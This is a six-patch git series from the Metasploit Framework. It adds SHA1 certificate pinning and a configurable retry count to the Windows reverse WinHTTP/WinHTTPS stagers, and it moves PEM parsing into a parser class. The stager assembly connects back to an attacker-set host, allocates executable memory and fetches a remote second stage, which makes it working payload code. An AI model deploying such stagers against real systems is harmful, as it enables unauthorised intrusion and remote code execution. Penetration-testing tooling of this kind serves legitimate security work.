From 11593800b6ffb91d486ebcabdbf0b2630d729b07 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 14 Mar 2015 15:52:23 -0500 Subject: [PATCH 1/6] Move X509 PEM parsing into Rex::Parser::X509Certificate --- lib/rex/parser/x509_certificate.rb | 62 ++++++++++++++++++++++++++++++ lib/rex/socket/ssl_tcp_server.rb | 21 +--------- 2 files changed, 64 insertions(+), 19 deletions(-) create mode 100644 lib/rex/parser/x509_certificate.rb diff --git a/lib/rex/parser/x509_certificate.rb b/lib/rex/parser/x509_certificate.rb new file mode 100644 index 0000000000..f46500bf5c --- /dev/null +++ b/lib/rex/parser/x509_certificate.rb @@ -0,0 +1,62 @@ +# -*- coding: binary -*- + +require 'openssl' + +module Rex +module Parser + +### +# +# This class parses the contents of a PEM-encoded X509 certificate file containing +# a private key, a public key, and any appended glue certificates. +# +### +class X509Certificate + + # + # Parse a certificate in unified PEM format that contains a private key and + # one or more certificates. The first certificate is the primary, while any + # additional certificates are treated as intermediary certificates. This emulates + # the behavior of web servers like nginx. + # + # @param [String] ssl_cert + # @return [String, String, Array] + def self.parse_pem(ssl_cert) + cert = nil + key = nil + chain = nil + + certs = [] + ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem| + if pem =~ /PRIVATE KEY/ + key = OpenSSL::PKey::RSA.new(pem) + elsif pem =~ /CERTIFICATE/ + certs << OpenSSL::X509::Certificate.new(pem) + end + end + + cert = certs.shift + if certs.length > 0 + chain = certs + end + + [key, cert, chain] + end + + # + # Parse a certificate in unified PEM format from a file + # + # @param [String] ssl_cert_file + # @return [String, String, Array] + def self.parse_pem_file(ssl_cert_file) + data = '' + ::File.open(ssl_cert_file, 'rb') do |fd| + data << fd.read(fd.stat.size) + end + parse_pem(data) + end + +end + +end +end diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb index 27ee44696f..742685d596 100644 --- a/lib/rex/socket/ssl_tcp_server.rb +++ b/lib/rex/socket/ssl_tcp_server.rb @@ -2,6 +2,7 @@ require 'rex/socket' require 'rex/socket/tcp_server' require 'rex/io/stream_server' +require 'rex/parser/x509_certificate' ### # @@ -108,25 +109,7 @@ module Rex::Socket::SslTcpServer # @param [String] ssl_cert # @return [String, String, Array] def self.ssl_parse_pem(ssl_cert) - cert = nil - key = nil - chain = nil - - certs = [] - ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem| - if pem =~ /PRIVATE KEY/ - key = OpenSSL::PKey::RSA.new(pem) - elsif pem =~ /CERTIFICATE/ - certs << OpenSSL::X509::Certificate.new(pem) - end - end - - cert = certs.shift - if certs.length > 0 - chain = certs - end - - [key, cert, chain] + Rex::Parser::X509Certificate.parse_pem(ssl_cert) end # From 03019cf451a008737144ff5e237d030e2c1d214c Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 14 Mar 2015 15:53:21 -0500 Subject: [PATCH 2/6] Adds StagerVerifySSLCert support (SHA1 of HandlerSSLCert) --- .../core/payload/windows/reverse_winhttp.rb | 107 ++++++++++++++++-- .../core/payload/windows/reverse_winhttps.rb | 59 +++++++++- 2 files changed, 156 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index bbb4d94575..c8851e609b 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -104,18 +104,29 @@ module Payload::Windows::ReverseWinHttp def asm_reverse_winhttp(opts={}) + verify_ssl = nil + encoded_cert_hash = nil + # - # options should contain: - # ssl: (true|false) - # url: "/url_to_request" - # host: [hostname] - # port: [port] - # exitfunk: [process|thread|seh|sleep] + # options can contain contain: + # ssl: (true|false) + # url: "/url_to_request" + # host: [hostname] + # port: [port] + # exitfunk: [process|thread|seh|sleep] + # verify_ssl: (true|false) + # verify_cert_hash: (40-byte SHA1 hash) # encoded_url = asm_generate_wchar_array(opts[:url]) encoded_host = asm_generate_wchar_array(opts[:host]) + if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash] + verify_ssl = true + encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",") + end + + http_open_flags = 0 if opts[:ssl] @@ -137,7 +148,20 @@ module Payload::Windows::ReverseWinHttp push esp ; Push a pointer to the "winhttp" string push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) call ebp ; LoadLibraryA( "winhttp" ) + ^ + if verify_ssl + asm << %Q^ + load_crypt32: + push 0x00323374 ; Push the string 'crypt32',0 + push 0x70797263 ; ... + push esp ; Push a pointer to the "crypt32" string + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wincrypt" ) + ^ + end + + asm << %Q^ set_retry: push.i8 6 ; retry 6 times pop edi @@ -215,7 +239,7 @@ module Payload::Windows::ReverseWinHttp push 0x91BB5895 ; hash( "winhttp.dll", "WinHttpSendRequest" ) call ebp test eax,eax - jnz receive_response ; if TRUE call WinHttpReceiveResponse API + jnz check_response ; if TRUE call WinHttpReceiveResponse API try_it_again: dec edi @@ -237,10 +261,77 @@ module Payload::Windows::ReverseWinHttp ^ end + # Jump target if the request was sent successfully + asm << %Q^ + check_response: + ^ + + # Verify the SSL certificate hash + if verify_ssl + + asm << %Q^ + ssl_cert_get_context: + push.i8 4 + mov ecx, esp ; Allocate &bufferLength + push.i8 0 + mov ebx, esp ; Allocate &buffer (ebx will point to *pCert) + + push ecx ; &bufferLength + push ebx ; &buffer + push.i8 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) + push esi ; hHttpRequest + push 0x272F0478 ; hash( "winhttp.dll", "WinHttpQueryOption" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ; ebx + ssl_cert_allocate_hash_space: + push.i8 20 ; + mov ecx, esp ; Store a reference to the address of 20 + sub esp,[ecx] ; Allocate 20 bytes for the hash output + mov edi, esp ; edi will point to our buffer + + ssl_cert_get_server_hash: + push ecx ; &bufferLength + push edi ; &buffer (20-byte SHA1 hash) + push.i8 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) + push [ebx] ; *pCert + push 0xC3A96E2D ; hash( "crypt32.dll", "CertGetCertificateContextProperty" ) + call ebp + test eax, eax ; + jz failure ; Bail out if we couldn't get the certificate context + + ssl_cert_start_verify: + call ssl_cert_compare_hashes + db #{encoded_cert_hash} + + ssl_cert_compare_hashes: + pop ebx ; ebx points to our internal 20-byte certificate hash (overwites *pCert) + ; edi points to the server-provided certificate hash + + push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times + pop ecx ; + mov edx, ecx ; Keep a reference to 4 in edx + + ssl_cert_verify_compare_loop: + mov eax, [ebx] ; Grab the next DWORD of the hash + cmp eax, [edi] ; Compare with the server hash + jnz failure ; Bail out if the DWORD doesn't match + add ebx, edx ; Increment internal hash pointer by 4 + add edi, edx ; Increment server hash pointer by 4 + loop ssl_cert_verify_compare_loop + + ; Our certificate hash was valid, hurray! + ssl_cert_verify_cleanup: + xor ebx, ebx ; Reset ebx back to zero + ^ + end + asm << %Q^ receive_response: ; The API WinHttpReceiveResponse needs to be called - ; first to get a valid handler for WinHttpReadData + ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) [2] push esi ; Request handler returned by WinHttpSendRequest [1] push 0x709D8805 ; hash( "winhttp.dll", "WinHttpReceiveResponse" ) diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index 4a219c8b4e..04f1bdc323 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -2,6 +2,7 @@ require 'msf/core' require 'msf/core/payload/windows/reverse_winhttp' +require 'rex/parser/x509_certificate' module Msf @@ -17,6 +18,17 @@ module Payload::Windows::ReverseWinHttps include Msf::Payload::Windows::ReverseWinHttp + # + # Register reverse_winhttps specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false]) + ], self.class) + end + # # Generate and compile the stager # @@ -37,13 +49,37 @@ module Payload::Windows::ReverseWinHttps # def generate + verify_cert = false + verify_cert_hash = nil + + if datastore['StagerVerifySSLCert'] + unless datastore['HandlerSSLCert'] + raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured" + else + verify_cert = true + hcert = Rex::Parser::X509Certificate.parse_pem_file(datastore['HandlerSSLCert']) + unless hcert and hcert[0] and hcert[1] + raise ArgumentError, "Could not parse a private key and certificate from #{datastore['HandlerSSLCert']}" + end + verify_cert_hash = Rex::Text.sha1_raw(hcert[1].to_der) + print_status("Stager will verify SSL Certificate with SHA1 hash #{verify_cert_hash.unpack("H*").first}") + end + end + # Generate the simple version of this stager if we don't have enough space if self.available_space.nil? || required_space > self.available_space + + if datastore['StagerVerifySSLCert'] + raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available" + end + return generate_reverse_winhttps( ssl: true, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash) end conf = { @@ -51,12 +87,31 @@ module Payload::Windows::ReverseWinHttps host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + verify_cert: verify_cert, + verify_cert_hash: verify_cert_hash } generate_reverse_winhttps(conf) end + # + # Determine the maximum amount of space required for the features requested + # + def required_space + space = super + + # SSL support adds 20 bytes + space += 20 + + # SSL verification adds 120 bytes + if datastore['StagerVerifySSLCert'] + space += 120 + end + + space + end + end end From 0d12ca49a7c684ed3acfc9a44c828d409e99bb9e Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 14 Mar 2015 16:19:13 -0500 Subject: [PATCH 3/6] Work around lack of option normalization during size calculation --- lib/msf/core/payload/windows/reverse_winhttps.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index 04f1bdc323..bfcaaa3ff9 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -25,7 +25,7 @@ module Payload::Windows::ReverseWinHttps super register_advanced_options( [ - OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false]) + OptBool.new('StagerVerifySSLCert', [false, 'Whether to verify the SSL certificate hash in the handler', false]) ], self.class) end @@ -52,7 +52,7 @@ module Payload::Windows::ReverseWinHttps verify_cert = false verify_cert_hash = nil - if datastore['StagerVerifySSLCert'] + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i unless datastore['HandlerSSLCert'] raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured" else @@ -69,7 +69,7 @@ module Payload::Windows::ReverseWinHttps # Generate the simple version of this stager if we don't have enough space if self.available_space.nil? || required_space > self.available_space - if datastore['StagerVerifySSLCert'] + if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available" end From 8e37342c502e1b1ab06c4ffb90fa161886cfc3b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sat, 14 Mar 2015 16:52:04 -0500 Subject: [PATCH 4/6] Comment typo --- lib/msf/core/payload/windows/reverse_winhttp.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index c8851e609b..d20c63e7a5 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -307,7 +307,7 @@ module Payload::Windows::ReverseWinHttp db #{encoded_cert_hash} ssl_cert_compare_hashes: - pop ebx ; ebx points to our internal 20-byte certificate hash (overwites *pCert) + pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert) ; edi points to the server-provided certificate hash push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times @@ -390,6 +390,8 @@ module Payload::Windows::ReverseWinHttp asm end + + end end From 69d92807482c8e40c6b142a5d43d4b55e35ff81c Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 16 Mar 2015 13:52:13 -0500 Subject: [PATCH 5/6] Fix yard docs, retries, push.i8 instructions. See commit 05138524e387e9ad7bb33f97db589e9dc70f45f1 Note that StagerRetryCount is not defined here, but will be in the parent class once #4934 lands --- .../core/payload/windows/reverse_winhttp.rb | 102 +++++++++--------- .../core/payload/windows/reverse_winhttps.rb | 6 +- 2 files changed, 54 insertions(+), 54 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index d20c63e7a5..0fc78adfe2 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -36,7 +36,8 @@ module Payload::Windows::ReverseWinHttp ssl: false, host: datastore['LHOST'], port: datastore['LPORT'], - url: generate_small_uri) + url: generate_small_uri, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -44,7 +45,8 @@ module Payload::Windows::ReverseWinHttp host: datastore['LHOST'], port: datastore['LPORT'], url: generate_uri, - exitfunk: datastore['EXITFUNC'] + exitfunk: datastore['EXITFUNC'], + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttp(conf) @@ -98,28 +100,26 @@ module Payload::Windows::ReverseWinHttp join(",") end + # - # Dynamic payload generation + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Bool] :ssl Whether or not to enable SSL + # @option opts [String] :url The URI to request during staging + # @option opts [String] :host The host to connect to + # @option opts [Fixnum] :port The port to connect to + # @option opts [Bool] :verify_ssl Whether or not to do SSL certificate validation + # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Fixnum] :retry_count The number of times to retry a failed request before giving up # def asm_reverse_winhttp(opts={}) - - verify_ssl = nil + retry_count = [opts[:retry_count].to_i, 1].max + verify_ssl = nil encoded_cert_hash = nil - - # - # options can contain contain: - # ssl: (true|false) - # url: "/url_to_request" - # host: [hostname] - # port: [port] - # exitfunk: [process|thread|seh|sleep] - # verify_ssl: (true|false) - # verify_cert_hash: (40-byte SHA1 hash) - # - - encoded_url = asm_generate_wchar_array(opts[:url]) - encoded_host = asm_generate_wchar_array(opts[:host]) + encoded_url = asm_generate_wchar_array(opts[:url]) + encoded_host = asm_generate_wchar_array(opts[:host]) if opts[:ssl] && opts[:verify_cert] && opts[:verify_cert_hash] verify_ssl = true @@ -162,45 +162,38 @@ module Payload::Windows::ReverseWinHttp end asm << %Q^ - set_retry: - push.i8 6 ; retry 6 times - pop edi - xor ebx, ebx - mov ecx, edi - push_zeros: - push ebx ; NULL values for the WinHttpOpen API parameters - loop push_zeros + xor ebx, ebx WinHttpOpen: - ; Flags [5] - ; ProxyBypass (NULL) [4] - ; ProxyName (NULL) [3] - ; AccessType (DEFAULT_PROXY= 0) [2] - ; UserAgent (NULL) [1] + push ebx ; Flags + push ebx ; ProxyBypass (NULL) + push ebx ; ProxyName (NULL) + push ebx ; AccessType (DEFAULT_PROXY= 0) + push ebx ; UserAgent (NULL) [1] push 0xBB9D1F04 ; hash( "winhttp.dll", "WinHttpOpen" ) call ebp WinHttpConnect: - push ebx ; Reserved (NULL) [4] + push ebx ; Reserved (NULL) push #{opts[:port]} ; Port [3] call got_server_uri ; Double call to get pointer for both server_uri and - server_uri: ; server_host; server_uri is saved in EDI for later + server_uri: ; server_host; server_uri is saved in edi for later db #{encoded_url} got_server_host: - push eax ; Session handle returned by WinHttpOpen [1] + push eax ; Session handle returned by WinHttpOpen push 0xC21E9B46 ; hash( "winhttp.dll", "WinHttpConnect" ) call ebp WinHttpOpenRequest: push.i32 #{"0x%.8x" % http_open_flags} - push ebx ; AcceptTypes (NULL) [6] - push ebx ; Referrer (NULL) [5] - push ebx ; Version (NULL) [4] - push edi ; ObjectName (URI) [3] - push ebx ; Verb (GET method) (NULL) [2] - push eax ; Connect handler returned by WinHttpConnect [1] + push ebx ; AcceptTypes (NULL) + push ebx ; Referrer (NULL) + push ebx ; Version (NULL) + push edi ; ObjectName (URI) + push ebx ; Verb (GET method) (NULL) + push eax ; Connect handle returned by WinHttpConnect push 0x5BB31098 ; hash( "winhttp.dll", "WinHttpOpenRequest" ) call ebp xchg esi, eax ; save HttpRequest handler in esi @@ -216,9 +209,9 @@ module Payload::Windows::ReverseWinHttp ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA mov eax, esp - push.i8 4 ; sizeof(buffer) + push 4 ; sizeof(buffer) push eax ; &buffer - push.i8 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) + push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest push 0xCE9D58D3 ; hash( "winhttp.dll", "WinHttpSetOption" ) call ebp @@ -226,6 +219,11 @@ module Payload::Windows::ReverseWinHttp end asm << %Q^ + ; Store our retry counter in the edi register + set_retry: + push #{retry_count} + pop edi + send_request: WinHttpSendRequest: @@ -271,14 +269,14 @@ module Payload::Windows::ReverseWinHttp asm << %Q^ ssl_cert_get_context: - push.i8 4 + push 4 mov ecx, esp ; Allocate &bufferLength - push.i8 0 + push 0 mov ebx, esp ; Allocate &buffer (ebx will point to *pCert) push ecx ; &bufferLength push ebx ; &buffer - push.i8 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) + push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) push esi ; hHttpRequest push 0x272F0478 ; hash( "winhttp.dll", "WinHttpQueryOption" ) call ebp @@ -287,7 +285,7 @@ module Payload::Windows::ReverseWinHttp ; ebx ssl_cert_allocate_hash_space: - push.i8 20 ; + push 20 ; mov ecx, esp ; Store a reference to the address of 20 sub esp,[ecx] ; Allocate 20 bytes for the hash output mov edi, esp ; edi will point to our buffer @@ -295,7 +293,7 @@ module Payload::Windows::ReverseWinHttp ssl_cert_get_server_hash: push ecx ; &bufferLength push edi ; &buffer (20-byte SHA1 hash) - push.i8 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) + push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) push [ebx] ; *pCert push 0xC3A96E2D ; hash( "crypt32.dll", "CertGetCertificateContextProperty" ) call ebp @@ -310,7 +308,7 @@ module Payload::Windows::ReverseWinHttp pop ebx ; ebx points to our internal 20-byte certificate hash (overwrites *pCert) ; edi points to the server-provided certificate hash - push.i8 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times + push 4 ; Compare 20 bytes (5 * 4) by repeating 4 more times pop ecx ; mov edx, ecx ; Keep a reference to 4 in edx @@ -332,8 +330,8 @@ module Payload::Windows::ReverseWinHttp receive_response: ; The API WinHttpReceiveResponse needs to be called ; first to get a valid handle for WinHttpReadData - push ebx ; Reserved (NULL) [2] - push esi ; Request handler returned by WinHttpSendRequest [1] + push ebx ; Reserved (NULL) + push esi ; Request handler returned by WinHttpSendRequest push 0x709D8805 ; hash( "winhttp.dll", "WinHttpReceiveResponse" ) call ebp test eax,eax @@ -342,7 +340,7 @@ module Payload::Windows::ReverseWinHttp asm << %Q^ allocate_memory: - push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x40 ; PAGE_EXECUTE_READWRITE push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index bfcaaa3ff9..993347db35 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb @@ -79,7 +79,8 @@ module Payload::Windows::ReverseWinHttps port: datastore['LPORT'], url: generate_small_uri, verify_cert: verify_cert, - verify_cert_hash: verify_cert_hash) + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount']) end conf = { @@ -89,7 +90,8 @@ module Payload::Windows::ReverseWinHttps url: generate_uri, exitfunk: datastore['EXITFUNC'], verify_cert: verify_cert, - verify_cert_hash: verify_cert_hash + verify_cert_hash: verify_cert_hash, + retry_count: datastore['StagerRetryCount'] } generate_reverse_winhttps(conf) From 5fd3637d34c9b6365593d34451dce5cacf4078f6 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 16 Mar 2015 14:00:51 -0500 Subject: [PATCH 6/6] Remove the i32 size specifier (not needed) --- lib/msf/core/payload/windows/reverse_winhttp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index 0fc78adfe2..8a5be39790 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -187,7 +187,7 @@ module Payload::Windows::ReverseWinHttp WinHttpOpenRequest: - push.i32 #{"0x%.8x" % http_open_flags} + push #{"0x%.8x" % http_open_flags} push ebx ; AcceptTypes (NULL) push ebx ; Referrer (NULL) push ebx ; Version (NULL)